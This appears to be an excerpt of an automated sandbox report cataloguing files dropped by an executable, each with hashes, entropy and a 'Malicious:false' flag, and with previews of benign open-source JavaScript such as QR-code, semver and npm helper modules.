              SHA-256:A67F0B2239DB81B1FC1DFD8E169A879D7075DD79D0AE00DC155E9C3BAC595891
              SHA-512:DC1C514F2CA06247107E5688A7EC42B8A4EA09C242E1330B5CD2DBC5D1E208F6D55AFEFF20286362784540EB78C6271E3A509D9765994C86C7E6D7ED7B27E568
              Malicious:false
              Reputation:unknown
              Preview:var QRMode = require('./QRMode');..function QR8bitByte(data) {..this.mode = QRMode.MODE_8BIT_BYTE;..this.data = data;.}..QR8bitByte.prototype = {...getLength : function() {...return this.data.length;..},....write : function(buffer) {...for (var i = 0; i < this.data.length; i++) {....// not JIS .......buffer.put(this.data.charCodeAt(i), 8);...}..}.};..module.exports = QR8bitByte;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):702
              Entropy (8bit):4.99731922977214
              Encrypted:false
              SSDEEP:
              MD5:D8F54E3A47885B855B9F32DA9F78E989
              SHA1:3436C404FB9A3F72DB8B59627E98D00F69D5A144
              SHA-256:0B5DE11B341F5DD92CAF3E3A26469F86FA3EB9B3795DB6A489E4D53D91ECB67D
              SHA-512:CF79486C7297A223957601D8F18764518AC454129AE230DFE08FA9F456F3198258573A9259AD99ABC6DB1DDB88A484F2AC068FAD686CAD278A5BDF04611A8426
              Malicious:false
              Reputation:unknown
              Preview:function QRBitBuffer() {..this.buffer = [];..this.length = 0;.}..QRBitBuffer.prototype = {...get : function(index) {...var bufIndex = Math.floor(index / 8);...return ( (this.buffer[bufIndex] >>> (7 - index % 8) ) & 1) == 1;..},....put : function(num, length) {...for (var i = 0; i < length; i++) {....this.putBit( ( (num >>> (length - i - 1) ) & 1) == 1);...}..},....getLengthInBits : function() {...return this.length;..},....putBit : function(bit) {.....var bufIndex = Math.floor(this.length / 8);...if (this.buffer.length <= bufIndex) {....this.buffer.push(0);...}.....if (bit) {....this.buffer[bufIndex] |= (0x80 >>> (this.length % 8) );...}.....this.length++;..}.};..module.exports = QRBitBuffer;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):54
              Entropy (8bit):4.317375411321983
              Encrypted:false
              SSDEEP:
              MD5:516474B3FEF879B29E4E235DAD45ECA5
              SHA1:724CD0992AFA759A2C0DF6346670B41AE5B1C680
              SHA-256:D11A145632CEA07057084190E86243B3054F30FC77256DC5EA0DC0E0CAE54608
              SHA-512:E42ABDAF45E8DC52DDDBC4F488B1D778B2CF4A25A1EEB89DC7D475F56E01864C7B3361C44B71070B38C1DAC764BE6E523E488428FD9990F93C97919D5EA8E886
              Malicious:false
              Reputation:unknown
              Preview:module.exports = {..L : 1,..M : 0,..Q : 3,..H : 2.};..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):157
              Entropy (8bit):4.363787321497316
              Encrypted:false
              SSDEEP:
              MD5:9DF19D971BBFBB6254A20BC2C0E8BD7A
              SHA1:2312FAECA2E1791B6AA50D22BD3461B4851A06DB
              SHA-256:B1F5A99876A31FCCBFBA89B973E11A4EB295F47B4B00E923814215309C0A725E
              SHA-512:3E92BFC73B7794A0B3C3D18B1E9602F59539BA05018B105561FCE809F60CDBBD0CBD32B3FED401D720D287ACBF193B2BCB761850CE9752CAAA6ED9CEFACCFFC2
              Malicious:false
              Reputation:unknown
              Preview:module.exports = {..PATTERN000 : 0,..PATTERN001 : 1,..PATTERN010 : 2,..PATTERN011 : 3,..PATTERN100 : 4,..PATTERN101 : 5,..PATTERN110 : 6,..PATTERN111 : 7.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):673
              Entropy (8bit):5.272116066476924
              Encrypted:false
              SSDEEP:
              MD5:04A83ECD110CB3E98FCA520C4CC344A0
              SHA1:4459F7AEC472FED9AB0E6F9697905D34F2C65F67
              SHA-256:481FE65CD1A049A3CDD659FF20C45EB4E0CB2DB285FA63A42478727E1B051667
              SHA-512:8B636314009B44525269036EC057AA83B27DC50C09AE61B544FAAF2A941BFEC810489A3D848CD9FBE179A926EE3EE16EBDBB1D3DECB0CD87DE1EED7B2426D28E
              Malicious:false
              Reputation:unknown
              Preview:var QRMath = {...glog : function(n) {.....if (n < 1) {....throw new Error("glog(" + n + ")");...}......return QRMath.LOG_TABLE[n];..},....gexp : function(n) {.....while (n < 0) {....n += 255;...}.....while (n >= 256) {....n -= 255;...}.....return QRMath.EXP_TABLE[n];..},....EXP_TABLE : new Array(256),....LOG_TABLE : new Array(256)..};...for (var i = 0; i < 8; i++) {..QRMath.EXP_TABLE[i] = 1 << i;.}.for (var i = 8; i < 256; i++) {..QRMath.EXP_TABLE[i] = QRMath.EXP_TABLE[i - 4]...^ QRMath.EXP_TABLE[i - 5]...^ QRMath.EXP_TABLE[i - 6]...^ QRMath.EXP_TABLE[i - 8];.}.for (var i = 0; i < 255; i++) {..QRMath.LOG_TABLE[QRMath.EXP_TABLE[i] ] = i;.}..module.exports = QRMath;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):149
              Entropy (8bit):4.170523724541031
              Encrypted:false
              SSDEEP:
              MD5:110674D48F7A6114BA9F3FC48D4F2262
              SHA1:7BDC08AAFD07ED900DD61DE23B25A581AC569BC8
              SHA-256:6B8EC04257A2D23B01E8189815292DCA3651B38EA0A8F9C975B3C1D18DFB1B01
              SHA-512:7E9662090603010489AFC2B806D77831E4C7864D36BB993664BC970CEA24D065DE2BEDC34410D0D0645945959963C1C40BA6B4EA67AED6639E1898A704D128D7
              Malicious:false
              Reputation:unknown
              Preview:module.exports = {. MODE_NUMBER : 1 << 0,. MODE_ALPHA_NUM : 1 << 1,. MODE_8BIT_BYTE : 1 << 2,. MODE_KANJI : 1 << 3.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1332
              Entropy (8bit):5.000158579299783
              Encrypted:false
              SSDEEP:
              MD5:5FD1BF81D7E4DDE5A4522DB4E23EA087
              SHA1:8DD9F1F6B941C626A205726B9BD416C0AB505534
              SHA-256:76EB786A451CEEE003CB4279B7BC559E8A77321DAD19CE11825A4D98D470B422
              SHA-512:933D051024E67DE2607E564FA05692B48966D51A816353961156FEA8C09E3FD8071266D82B9DD1A1C086A4CB645590FE3D3E1EE1732807F6CB589B5F2C0A236E
              Malicious:false
              Reputation:unknown
              Preview:var QRMath = require('./QRMath');..function QRPolynomial(num, shift) {..if (num.length === undefined) {...throw new Error(num.length + "/" + shift);..}...var offset = 0;...while (offset < num.length && num[offset] === 0) {...offset++;..}...this.num = new Array(num.length - offset + shift);..for (var i = 0; i < num.length - offset; i++) {...this.num[i] = num[i + offset];..}.}..QRPolynomial.prototype = {...get : function(index) {...return this.num[index];..},....getLength : function() {...return this.num.length;..},....multiply : function(e) {.....var num = new Array(this.getLength() + e.getLength() - 1);.....for (var i = 0; i < this.getLength(); i++) {....for (var j = 0; j < e.getLength(); j++) {.....num[i + j] ^= QRMath.gexp(QRMath.glog(this.get(i) ) + QRMath.glog(e.get(j) ) );....}...}.....return new QRPolynomial(num, 0);..},....mod : function(e) {.....if (this.getLength() - e.getLength() < 0) {....return this;...}.....var ratio = QRMath.glog(this.get(0) ) - QRMath.glog(e.get(0) );...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5556
              Entropy (8bit):4.59431780055971
              Encrypted:false
              SSDEEP:
              MD5:FBC9888D422824EEC5A4DFEB9F581D1F
              SHA1:4FE3669BA802CAF3B73984F0C56601E3BDA9FB36
              SHA-256:78281D6A39B575A1078F1F70E7311E4A3C8B67E15E5468C25521B64D6FF6B931
              SHA-512:F04AFE77790E6122E096964143C7D15ED230ABA8DFAB73D7720AF0A36B53BE621F40112C6D8D9739743A18B6E519272F5E46271A15A7AB21B409356DDEC43B94
              Malicious:false
              Reputation:unknown
              Preview:var QRErrorCorrectLevel = require('./QRErrorCorrectLevel');..function QRRSBlock(totalCount, dataCount) {..this.totalCount = totalCount;..this.dataCount = dataCount;.}..QRRSBlock.RS_BLOCK_TABLE = [...// L..// M..// Q..// H...// 1..[1, 26, 19],..[1, 26, 16],..[1, 26, 13],..[1, 26, 9],....// 2..[1, 44, 34],..[1, 44, 28],..[1, 44, 22],..[1, 44, 16],...// 3..[1, 70, 55],..[1, 70, 44],..[2, 35, 17],..[2, 35, 13],...// 4....[1, 100, 80],..[2, 50, 32],..[2, 50, 24],..[4, 25, 9],....// 5..[1, 134, 108],..[2, 67, 43],..[2, 33, 15, 2, 34, 16],..[2, 33, 11, 2, 34, 12],....// 6..[2, 86, 68],..[4, 43, 27],..[4, 43, 19],..[4, 43, 15],....// 7....[2, 98, 78],..[4, 49, 31],..[2, 32, 14, 4, 33, 15],..[4, 39, 13, 1, 40, 14],....// 8..[2, 121, 97],..[2, 60, 38, 2, 61, 39],..[4, 40, 18, 2, 41, 19],..[4, 40, 14, 2, 41, 15],....// 9..[2, 146, 116],..[3, 58, 36, 2, 59, 37],..[4, 36, 16, 4, 37, 17],..[4, 36, 12, 4, 37, 13],....// 10....[2, 86, 68, 2, 87, 69],..[4, 69, 43, 1, 70, 44],..[6, 43, 19, 2, 44, 20],.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):8222
              Entropy (8bit):4.310143676242053
              Encrypted:false
              SSDEEP:
              MD5:A4ADB117AE10378F06CADBB7D9470178
              SHA1:2847D5273A4DDD55882ADC5B9EE171AD436DEE84
              SHA-256:4191CE852BA66124C4F1FC3BB1A507F667193C0466731339D8C1E66A19AA6BC5
              SHA-512:0C2CD71520D9185615379BB5C8C3BD07F13DF071C97FB93BAE29B0D94B5D68C25F4AEB530696DCDC5CBDF348B924E75AA705BCADF5287FC99AA7B84C1D07D941
              Malicious:false
              Reputation:unknown
              Preview:var QRMode = require('./QRMode');.var QRPolynomial = require('./QRPolynomial');.var QRMath = require('./QRMath');.var QRMaskPattern = require('./QRMaskPattern');..var QRUtil = {.. PATTERN_POSITION_TABLE : [. [],. [6, 18],. [6, 22],. [6, 26],. [6, 30],. [6, 34],. [6, 22, 38],. [6, 24, 42],. [6, 26, 46],. [6, 28, 50],. [6, 30, 54], . [6, 32, 58],. [6, 34, 62],. [6, 26, 46, 66],. [6, 26, 48, 70],. [6, 26, 50, 74],. [6, 30, 54, 78],. [6, 30, 56, 82],. [6, 30, 58, 86],. [6, 34, 62, 90],. [6, 28, 50, 72, 94],. [6, 26, 50, 74, 98],. [6, 30, 54, 78, 102],. [6, 28, 54, 80, 106],. [6, 32, 58, 84, 110],. [6, 30, 58, 86, 114],. [6, 34, 62, 90, 118],. [6, 26, 50, 74, 98, 122],. [6, 30, 54, 78, 102, 126],. [6, 26, 52, 78, 104, 130],. [6, 30, 56, 82, 108, 134],. [6, 34,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):10666
              Entropy (8bit):5.194066935174434
              Encrypted:false
              SSDEEP:
              MD5:7B5EFB90599E1EE8E91F04E342DE93C1
              SHA1:44425B42677AF7169BDB92E680AA3F22F1B68A08
              SHA-256:7377BE90FC61A40268ACF7F30D5BD89C2FCA99C57EF5391623DE8C151B8DA7DF
              SHA-512:CC269FFFF563E3904C154C669E8EF69DF0FF1A002EE3B75E95AD8FC6AB08B9583AE89D857DE57089D4D68335B67954F8ADC44D7FB6D73F4023BFFD805800BA5C
              Malicious:false
              Reputation:unknown
              Preview://---------------------------------------------------------------------.// QRCode for JavaScript.//.// Copyright (c) 2009 Kazuhiko Arase.//.// URL: http://www.d-project.com/.//.// Licensed under the MIT license:.// http://www.opensource.org/licenses/mit-license.php.//.// The word "QR Code" is registered trademark of .// DENSO WAVE INCORPORATED.// http://www.denso-wave.com/qrcode/faqpatent-e.html.//.//---------------------------------------------------------------------.// Modified to work in node for this project (and some refactoring).//---------------------------------------------------------------------..var QR8bitByte = require('./QR8bitByte');.var QRUtil = require('./QRUtil');.var QRPolynomial = require('./QRPolynomial');.var QRRSBlock = require('./QRRSBlock');.var QRBitBuffer = require('./QRBitBuffer');..function QRCode(typeNumber, errorCorrectLevel) {..this.typeNumber = typeNumber;..this.errorCorrectLevel = errorCorrectLevel;..this.modules = null;..this.moduleCount = 0;..thi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2068
              Entropy (8bit):4.847920508714343
              Encrypted:false
              SSDEEP:
              MD5:47A0EB8FAFDE3A1B9E0F7CA01EC0D9F2
              SHA1:EBC14FD40F75DE422BAD6F9DECFE0B044C1F39AA
              SHA-256:34C269D0DCFBF2D28A12D7B3D8FD16136FC4861761F3880AFB1AB308D697DCEA
              SHA-512:CA4DF90A2659D1CAF40805CDF26C714DBE9A38CEBB2FD574CD27679D5EA3644965269451240D2B6D18923D964A4BB1F5C379B3056EE3E03E42BAD42D583BB692
              Malicious:false
              Reputation:unknown
              Preview:const fs = require('fs').const { promisify } = require('util').const { readFileSync } = fs.const readFile = promisify(fs.readFile)..const extractPath = (path, cmdshimContents) => {. if (/[.]cmd$/.test(path)) {. return extractPathFromCmd(cmdshimContents). } else if (/[.]ps1$/.test(path)) {. return extractPathFromPowershell(cmdshimContents). } else {. return extractPathFromCygwin(cmdshimContents). }.}..const extractPathFromPowershell = cmdshimContents => {. const matches = cmdshimContents.match(/"[$]basedir[/]([^"]+?)"\s+[$]args/). return matches && matches[1].}..const extractPathFromCmd = cmdshimContents => {. const matches = cmdshimContents.match(/"%(?:~dp0|dp0%)\\([^"]+?)"\s+%[*]/). return matches && matches[1].}..const extractPathFromCygwin = cmdshimContents => {. const matches = cmdshimContents.match(/"[$]basedir[/]([^"]+?)"\s+"[$]@"/). return matches && matches[1].}..const wrapError = (thrown, newError) => {. newError.message = thrown.message. newError.code = t
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1202
              Entropy (8bit):4.749756487303088
              Encrypted:false
              SSDEEP:
              MD5:38D7C4272E3C786C3ACF474E6984ABEF
              SHA1:BBCC7F900D866336F79905342ACD14B0AA9E84D0
              SHA-256:E50F6BDAC0E70FA6A2F7A50E5EDB7A04E3AE69D399B4E6664005476A61730FC5
              SHA-512:F4C40EB42CF7E70B0919087FD8B3C9FFF7A450F9FF9A5213386B8DFE86D97AB86E029ECD8570EBEA3C645B8B39B21DE20DEB8F14600AC815C88C5FA3E3FF2613
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "read-cmd-shim",. "version": "4.0.0",. "description": "Figure out what a cmd-shim is pointing at. This acts as the equivalent of fs.readlink.",. "main": "lib/index.js",. "devDependencies": {. "@npmcli/eslint-config": "^3.0.1",. "@npmcli/template-oss": "4.5.1",. "cmd-shim": "^5.0.0",. "rimraf": "^3.0.0",. "tap": "^16.0.1". },. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "tap": {. "check-coverage": true,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "repository": {. "type": "git",. "url": "https://github.com/npm/read-cmd-shim.git". },. "license": "ISC",. "homepage": "https://github.com/npm/read-cmd-shim#readme",. "files": [. "bin/",. "lib/". ],. "author": "GitHub Inc.",. "engines": {. "node": "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):748
              Entropy (8bit):4.9874659390608365
              Encrypted:false
              SSDEEP:
              MD5:6392DC4522C189C9616B2EC1AB763BEC
              SHA1:3E7D524594D6D603A4B7E7D1ABE8A7398E6B3837
              SHA-256:69BE713B3D6C33E0DBA76C4D23D986D568593ABCA04CE47D75162AF255D6A345
              SHA-512:9612889AE121B2334D10BB4D522B6250D430413632A8E6775E3B8C54C83AD99C99223135112F36ED9DF44EA01B7A20D3F63636CEA01A58AD730CE13DE186C7CA
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) Isaac Z. Schlueter..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH.REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND.FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,.INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM.LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR.OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR.PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):13589
              Entropy (8bit):4.786713742798202
              Encrypted:false
              SSDEEP:
              MD5:3AD7BCBECEBF467470E2A2B46ECB4D18
              SHA1:F1A154064BC096C4E65BC8D25EAA5082B39B151C
              SHA-256:E9D9B32FD68088BEFAD84F8A9589108CF208FD3A4A74F0DED6CC5E807559D5C3
              SHA-512:5B490A732A920BD2489C3774AE91499817A119D25A5AC319A0BC100DB1D101B4C8DFE1018E2CC62A22097DABB25F4F91176674948ED9BE2147A4AA4C1B793401
              Malicious:false
              Reputation:unknown
              Preview:var fs = require('fs')..var path = require('path')..var { glob } = require('glob').var normalizeData = require('normalize-package-data').var safeJSON = require('json-parse-even-better-errors').var util = require('util').var normalizePackageBin = require('npm-normalize-package-bin')..module.exports = readJson..// put more stuff on here to customize..readJson.extraSet = [. bundleDependencies,. gypfile,. serverjs,. scriptpath,. authors,. readme,. mans,. bins,. githead,. fillTypes,.]..var typoWarned = {}.var cache = {}..function readJson (file, log_, strict_, cb_) {. var log, strict, cb. for (var i = 1; i < arguments.length - 1; i++) {. if (typeof arguments[i] === 'boolean') {. strict = arguments[i]. } else if (typeof arguments[i] === 'function') {. log = arguments[i]. }. }.. if (!log) {. log = function () {}. }. cb = arguments[arguments.length - 1].. readJson_(file, log, strict, cb).}..function readJson_ (file, log, strict, cb) {. fs.readFile(file,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1759
              Entropy (8bit):4.421668716225936
              Encrypted:false
              SSDEEP:
              MD5:3CCA5610A9729B2EA0407919392078F8
              SHA1:88498DB7963DED7F66AEA4706D2E580EA5A2F111
              SHA-256:2473397F88A27FF107EE07023A25B73E86312FE449636E023895FE32507526A3
              SHA-512:F2F08464241B6830B43D8CD4835B1FC055519263C3050B1DD184CCFE5F8F4F730678B3A1204CBE6F671D885345180879C9FEB68D839C35F63010A8A2DAA70216
              Malicious:false
              Reputation:unknown
              Preview:const readline = require('readline').const Mute = require('mute-stream')..module.exports = async function read ({. default: def = '',. input = process.stdin,. output = process.stdout,. completer,. prompt = '',. silent,. timeout,. edit,. terminal,. replace,.}) {. if (typeof def !== 'undefined' && typeof def !== 'string' && typeof def !== 'number') {. throw new Error('default value must be string or number'). }.. let editDef = false. prompt = prompt.trim() + ' '. terminal = !!(terminal || output.isTTY).. if (def) {. if (silent) {. prompt += '(<default hidden>) '. } else if (edit) {. editDef = true. } else {. prompt += '(' + def + ') '. }. }.. const m = new Mute({ replace, prompt }). m.pipe(output, { end: false }). output = m.. return new Promise((resolve, reject) => {. const rl = readline.createInterface({ input, output, terminal, silent: true, completer }). const timer = timeout && setTimeout(() => onError(new Error('timed out')),
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1173
              Entropy (8bit):4.676929351007754
              Encrypted:false
              SSDEEP:
              MD5:0DCB62D1AFAD433C397D9B68AAA798B9
              SHA1:3274A102140FB2317570B7ADEA76BB712DEEECC4
              SHA-256:811F9565C00D65F20363014CD788AB8D4A3E68D335F8EDBDF515BD731EE80EB1
              SHA-512:7128CF054A46DF4B2650C16CDAB5CBFAB74F12FF1B594A08047413576DFDA6CECE196527CFEA3D964A4589355273D37E1FF91EE5589B2A72823503A63601CBB3
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "read",. "version": "2.1.0",. "main": "lib/read.js",. "dependencies": {. "mute-stream": "~1.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.13.0",. "tap": "^16.3.0". },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "author": "GitHub Inc.",. "description": "read(1) for node programs",. "repository": {. "type": "git",. "url": "https://github.com/npm/read.git". },. "license": "ISC",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "files": [. "bin/",. "lib/". ],. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.13.0",. "publish": "true". },. "tap": {. "stateme
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):118
              Entropy (8bit):4.30308109257168
              Encrypted:false
              SSDEEP:
              MD5:4375B6D0D0A7CED1F709F810BB52E9DA
              SHA1:51F8192667AA9E1320E7FE0616B583039E8042C0
              SHA-256:5C95FF2FA2F8533041579F34835E2B4F5680EA9F4D8D08FF1F4D537CFD9F7896
              SHA-512:AE503150BAB2E293F2F66008C97485C5E2A51F2938989B4A075382CD256EF4BA54FE5D56AE5E2D8DB546B0FD5E15A83AB45142D665D72F7C76EAC68DC532661B
              Malicious:false
              Reputation:unknown
              Preview:const compare = require('./compare').const rcompare = (a, b, loose) => compare(b, a, loose).module.exports = rcompare.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):149
              Entropy (8bit):4.504151050441294
              Encrypted:false
              SSDEEP:
              MD5:2E50A97BD158129F5DC59CF94D1050B0
              SHA1:1E99DCF8AA9518558B2A6945302273AC7B8D69BC
              SHA-256:89DBDB1542343CB549ECD12CD8C79AE01E6111215445EA6B091F337FADDD6EBE
              SHA-512:501426E6DD39A324B75B8503147DFAB0EEDDADB4004658025EE5B33ECCA8FCFB6C8FAF906EB5468805C0A253D239F6BA5219167AAED591C2D5F150682DD83D4B
              Malicious:false
              Reputation:unknown
              Preview:const compareBuild = require('./compare-build').const rsort = (list, loose) => list.sort((a, b) => compareBuild(b, a, loose)).module.exports = rsort.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):233
              Entropy (8bit):4.40796333020284
              Encrypted:false
              SSDEEP:
              MD5:B0F79B194E24E3E4F2A2881C4FAECB96
              SHA1:47A3E3141433768A2CA6A03841C842D15CF419C2
              SHA-256:DAC3A0AF5BBD5EBD2E9B8486582ED61DDEC694A9FC9D6AFB343B185A1FB3E59F
              SHA-512:A5F99518C40A72FB921071BAB560D2C68576A5B9AA8A9C03E97B1DB945B32A89B96F9B7BF8AA0825CA70D7602FFCEB1CAD9B6CEBD6124F676BA3593F8998B44E
              Malicious:false
              Reputation:unknown
              Preview:const Range = require('../classes/range').const satisfies = (version, range, options) => {. try {. range = new Range(range, options). } catch (er) {. return false. }. return range.test(version).}.module.exports = satisfies.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):147
              Entropy (8bit):4.512507853400447
              Encrypted:false
              SSDEEP:
              MD5:B6B1E8291BA15107B6F474A9A6791499
              SHA1:B7FC2BC365D5F6F9E2AD842441755E7B8B19DE5C
              SHA-256:5E3E30991733D8C977AFB5CEF564A855C2BCCD96C080D83E5422E3876CD512FD
              SHA-512:75F7C1440676ABE497571B86ED843A60CFE03464D1986864B685CDA5B31326C88090A845883E37CAC3D58F862312F94BA8107BF558C97C3672270CDC1CFB72AD
              Malicious:false
              Reputation:unknown
              Preview:const compareBuild = require('./compare-build').const sort = (list, loose) => list.sort((a, b) => compareBuild(a, b, loose)).module.exports = sort.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):162
              Entropy (8bit):4.409730435040831
              Encrypted:false
              SSDEEP:
              MD5:4C97CED41F4870AF4043608388E7A762
              SHA1:EDC5B800B8F302AC7CE238A419A02810CDEED8F2
              SHA-256:D60B69794E2094B2AEF35ABBED5D17B9E14B41A4FEF2AD5A38DA4E2171D1C49F
              SHA-512:56999BF144A820BB8F89B4F483AF70B2A67ADAB5C12356508ACEBD8A3C497D45518BDBFF5954389E3FD4CD822AF53CE64C47F5AC7919264D4D90152DC354F94D
              Malicious:false
              Reputation:unknown
              Preview:const parse = require('./parse').const valid = (version, options) => {. const v = parse(version, options). return v ? v.version : null.}.module.exports = valid.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2616
              Entropy (8bit):4.736575967741774
              Encrypted:false
              SSDEEP:
              MD5:8DECAB35EEA2983822C71D79A42A91AC
              SHA1:C01F38060F8C1EEA0A62EE127AFC3A7601029818
              SHA-256:02D8461FC6158ED3FDD4DAD17905BEE651A1638218DB1FB5FBB84E83144AA3A9
              SHA-512:98FD8357A16035547490FAEA2520905005625E3DEDF49E3D0BD9E59924C8A74D0B77D58DBC42BF4FDC772949A0C8C3625B60B210AE824B9CA121C0109F7B3BE6
              Malicious:false
              Reputation:unknown
              Preview:// just pre-load all the stuff that index.js lazily exports.const internalRe = require('./internal/re').const constants = require('./internal/constants').const SemVer = require('./classes/semver').const identifiers = require('./internal/identifiers').const parse = require('./functions/parse').const valid = require('./functions/valid').const clean = require('./functions/clean').const inc = require('./functions/inc').const diff = require('./functions/diff').const major = require('./functions/major').const minor = require('./functions/minor').const patch = require('./functions/patch').const prerelease = require('./functions/prerelease').const compare = require('./functions/compare').const rcompare = require('./functions/rcompare').const compareLoose = require('./functions/compare-loose').const compareBuild = require('./functions/compare-build').const sort = require('./functions/sort').const rsort = require('./functions/rsort').const gt = require('./functions/gt').const lt = require('./fun
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):859
              Entropy (8bit):5.387927956518198
              Encrypted:false
              SSDEEP:
              MD5:7D19ED9BE46CAAD1D1E359D39808AD4B
              SHA1:819A733E61B6014CA6FEEB6A570304612AFE2B52
              SHA-256:0E3C33323906F2C612B0855895965F3EBAC4865DD8FA9C6B4893CD4EA71E383E
              SHA-512:860E8E4864AF81180EFEF5521D247FA42992A4D8F2BFB38A8E0324CF258E78053788DCFA2331A7E5EAC2D587C324F774811D1C247091690238E631F7E958DEBF
              Malicious:false
              Reputation:unknown
              Preview:// Note: this is the semver.org version of the spec that it implements.// Not necessarily the package version of this code..const SEMVER_SPEC_VERSION = '2.0.0'..const MAX_LENGTH = 256.const MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER ||./* istanbul ignore next */ 9007199254740991..// Max safe segment length for coercion..const MAX_SAFE_COMPONENT_LENGTH = 16..// Max safe length for a build identifier. The max length minus 6 characters for.// the shortest version with a build 0.0.0+BUILD..const MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6..const RELEASE_TYPES = [. 'major',. 'premajor',. 'minor',. 'preminor',. 'patch',. 'prepatch',. 'prerelease',.]..module.exports = {. MAX_LENGTH,. MAX_SAFE_COMPONENT_LENGTH,. MAX_SAFE_BUILD_LENGTH,. MAX_SAFE_INTEGER,. RELEASE_TYPES,. SEMVER_SPEC_VERSION,. FLAG_INCLUDE_PRERELEASE: 0b001,. FLAG_LOOSE: 0b010,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):226
              Entropy (8bit):4.940800841253999
              Encrypted:false
              SSDEEP:
              MD5:139A1CD83EE340FB2F1220BDB1BA608F
              SHA1:D6166E7A8EDA16340619CB02EE09C19A422B8333
              SHA-256:9557F905ECF6E36F97653841E08FD30074BA37AD529070A090BA352986DE4FA2
              SHA-512:68135CA671F5A8849699FFCBE6189EF0E2D7B7D4A8B18119A790C2334BBBEA732DE8B4777CCF1843F66AD6D2B2043E61C5D69BB76347E92708BB5234B173738D
              Malicious:false
              Reputation:unknown
              Preview:const debug = (. typeof process === 'object' &&. process.env &&. process.env.NODE_DEBUG &&. /\bsemver\b/i.test(process.env.NODE_DEBUG).) ? (...args) => console.error('SEMVER', ...args). : () => {}..module.exports = debug.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):410
              Entropy (8bit):4.539892789208746
              Encrypted:false
              SSDEEP:
              MD5:C90E47F4AC3E7E6136EA67A64BCE02E2
              SHA1:510C174C5BFC993023542E3B4F699CD18E2E0559
              SHA-256:B8799F9187C52CEEFEE48A395E09073F1D1594C8468C012E84104E72D8F7014D
              SHA-512:016CDD665FE8A7191D913B4BD9238BD6DC54354434F53900C543DEA815135E67D0E716010E8FAA315CC0911957C788A39163BBF62ACC51BCBBCF48546D6D6ABB
              Malicious:false
              Reputation:unknown
